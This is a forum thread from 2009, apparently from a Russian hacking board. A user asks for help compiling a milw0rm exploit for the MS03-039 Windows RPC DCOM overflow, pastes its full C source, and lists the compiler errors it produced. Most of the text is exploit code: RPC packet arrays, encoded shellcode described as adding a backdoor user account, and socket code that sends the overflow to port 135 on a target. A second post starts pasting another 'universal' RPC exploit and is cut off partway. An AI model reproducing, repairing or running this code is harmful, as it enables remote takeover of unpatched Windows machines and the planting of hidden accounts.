не могу скомпилить сплоит :(

Discussion in 'Безопасность и Анонимность' started by $ereg@, 4 Mar 2009.

  1. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    вопщем надо скомпилить сплоит ms03-039
    взял с милворма сначало этот:
    ---------------------------------------------------------------------
    /*
    RPCDCOM2.c ver1.1
    copy by FLASHSKY flashsky at xfocus.org 2003.9.14
    */
    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



    unsigned char sccnsp3sp4[]=
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

    //SHELLCODE From SAM ,THANKs !
    //Add user SST,password is 557,
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
    "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
    "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os


    //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
    //"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";


    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };

    void main(int argc,char ** argv)
    {
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    printf("Code by FlashSky,Flashsky xfocus org\n");
    printf("Welcome to our Site: http://www.xfocus.org\n");
    printf("Welcome to our Site: http://www.venustech.com.cn\n");
    if(argc!=2)
    {
    printf("%s targetIP \n",argv[0]);
    printf("for cn w2k server sp3/sp4+ms03-26\n");
    }

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
    printf("WSAStartup error.Error:%d\n",WSAGetLastError());
    return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
    printf("Socket failed.Error:%d\n",WSAGetLastError());
    return;
    }
    len1=sizeof(request1);
    len=sizeof(sccnsp3sp4);

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
    printf("Connect failed.Error:%d",WSAGetLastError());
    return;
    }
    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4));
    len1=len1+sizeof(sccnsp3sp4);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return;
    }

    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return;
    }
    // len=recv(sock,buf1,1024,NULL);
    }

    /*

    */

    // milw0rm.com [2003-09-20]
    ---------------------------------------------------------------------
    компилятор мне вот чё выдал:
    error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [72]' to 'const char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
    error C2664: 'recv' : cannot convert parameter 2 from 'unsigned char [4096]' to 'char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
    error C2664: 'send' : cannot
    convert parameter 2 from 'unsigned char [4096]' to 'const char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
    исравить я не смог :(
    потом попробовал скомпилить этот сплоит (тоже с милворма):
     
    #1 $ereg@, 4 Mar 2009
  2. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    ----------------------------------------------
    /* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
    /* Must be used with the associated shell */
    /* */
    /* This exploit works against unpatched systems (MS03-039) */
    /* And cause a Denial of Service on patched systems (rpc3) */


    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    FILE *fp1;
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
